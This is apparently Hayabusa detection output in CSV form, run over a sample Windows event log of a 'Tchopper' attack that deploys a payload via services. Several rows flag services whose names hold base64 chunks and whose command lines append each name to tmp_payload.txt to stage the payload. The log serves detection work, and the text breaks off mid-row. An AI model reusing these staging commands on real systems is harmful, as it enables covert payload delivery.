+00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:04.364 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:05.817 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:05.817 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:05.817 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:07.256 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:07.256 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:07.256 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:08.709 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:08.709 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:08.709 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:10.219 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:10.219 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:10.219 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:11.712 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:11.712 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:11.712 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:13.157 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:13.157 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:13.157 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:14.610 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:14.610 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:14.610 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:16.058 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:16.058 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:16.058 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:17.508 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:17.508 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:17.508 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:18.961 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:18.961 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:18.961 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:20.414 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:20.414 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:20.414 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:21.867 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:21.867 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:21.867 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 